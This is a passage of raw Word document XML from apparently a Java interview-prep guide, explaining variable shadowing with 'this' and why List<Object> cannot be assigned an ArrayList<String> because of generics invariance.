          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">b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b</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A19D69"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6600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3120ADF8"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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>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showData</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBEE16E"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0066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>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Value of 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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDB06BD"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0066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>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Value of B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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239E48F8"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6600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A621070"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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1D50F5"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0066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>Account</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> obj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ccount</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B7B0A7"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>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etData</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p>
    <w:p w14:paraId="6C00D500"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>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howData</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F85523"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6600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE70E89"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1DB2A5D0" w14:textId="5D9E0488" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C" w:rsidP="00EC1219">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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 xml:space="preserve">You're encountering a classic issue of </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>variable shadowing</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — the method parameters a and b are shadowing the instance variables a and b.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698FD7D4" w14:textId="77777777" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C" w:rsidP="00EC1219">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> To fix this, you should use this keyword to refer to the instance variables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E57D3DB"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class Account {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A674B5B"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ab/>
        <w:t>int a;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C2B0E3"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ab/>
        <w:t>int b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5308AB3D" w14:textId="77777777" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C" w:rsidP="00EC1219">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E9E1489"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ab/>
        <w:t>public void setData(int a, int b) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61868949"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ab/>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>this.a = a;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014D943C"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ab/>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>this.b = b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183C65B1"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ab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6015EB00" w14:textId="77777777" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C" w:rsidP="00EC1219">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43E55114"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ab/>
        <w:t>public void showData() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6447FA"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ab/>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>System.out.println("Value of A = " + a);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552A283F"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ab/>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>System.out.println("Value of B = " + b);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D56DE57"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ab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189C8733" w14:textId="77777777" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C" w:rsidP="00EC1219">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47FB6FF7"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ab/>
        <w:t>public static void main(String args[]) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140338AA"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ab/>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>Account obj = new Account();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA194BE"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ab/>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>obj.setData(2, 3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D425B4"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ab/>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>obj.showData();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB71459"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ab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16948FBF"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5B5E23" w14:textId="77777777" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C" w:rsidP="00EC1219">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>💡</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3837570E"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Value of A = 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1394F8"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Value of B = 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1046C29E"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Let me know if you want an explanation of why this is necessary here!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16461A91" w14:textId="2F121D3F" w:rsidR="00AF4D54" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00AF4D5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7ECB615">
          <v:rect id="_x0000_i1890" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E98BE19" w14:textId="77777777" w:rsidR="00FB487C" w:rsidRPr="00CE4B95" w:rsidRDefault="00FB487C" w:rsidP="00AF4D54">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C6504A0" w14:textId="77777777" w:rsidR="00F02018" w:rsidRPr="00CE4B95" w:rsidRDefault="00F02018">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="306" w:name="_Toc196307786"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Scenario based question - 5?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="306"/>
    </w:p>
    <w:p w14:paraId="1A6F2E0B" w14:textId="77777777" w:rsidR="00F02018" w:rsidRPr="00CE4B95" w:rsidRDefault="00F02018" w:rsidP="00F02018">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>What will happen if we declare the list below?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36460D26" w14:textId="77777777" w:rsidR="00F02018" w:rsidRPr="00CE4B95"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Object</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a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p>
    <w:p w14:paraId="7E0E267F" w14:textId="0457900F" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C" w:rsidP="00EC1219">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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The line:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE7C28E"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List&lt;Object&gt; var = new ArrayList&lt;String&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791FBB7E"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 xml:space="preserve">will </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not compile</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and results in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>compilation error</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5168BEFE" w14:textId="77777777" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C" w:rsidP="00EC1219">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Why?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A73F79B"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 xml:space="preserve">Because of </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>invariance in generics</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java. Even though String is a subtype of Object, List&lt;String&gt; is </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> a subtype of List&lt;Object&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEECD47" w14:textId="77777777" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C" w:rsidP="00EC1219">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔧</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Compilation Error:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D45D9B6"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incompatible types: ArrayList&lt;String&gt; cannot be converted to List&lt;Object&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBDE872" w14:textId="77777777" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C" w:rsidP="00EC1219">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Correct Alternatives:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8B2246"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If you want to allow a list that can hold any type, use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AEAE7E"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List&lt;?&gt; var = new ArrayList&lt;String&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03691A87"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 xml:space="preserve">List&lt;?&gt; is a list of unknown type — it's </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>read-only</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (you can't add elements to it except null).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722B5F2B"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If you want to write elements (with limitations), use bounded wildcards:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EEE252"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List&lt;? extends Object&gt; var = new ArrayList&lt;String&gt;(); // read-only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6D1444"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Or just declare the list with matching generics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AF628D"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 xml:space="preserve">List&lt;String&gt; var = new ArrayList&lt;String&gt;(); // </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Compiles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6479A4" w14:textId="77777777" w:rsidR="00FB487C" w:rsidRPr="00EC1219" w:rsidRDefault="00FB487C"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lastRenderedPageBreak/>
        <w:t>Let me know if you’d like a quick cheat sheet on generics with wildcards (?, extends, super) — super handy in interviews!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC5B705" w14:textId="433DA6F6" w:rsidR="00F851C0" w:rsidRDefault="00000000" w:rsidP="003E4B77">
      <w:pPr>
        <w:rPr>
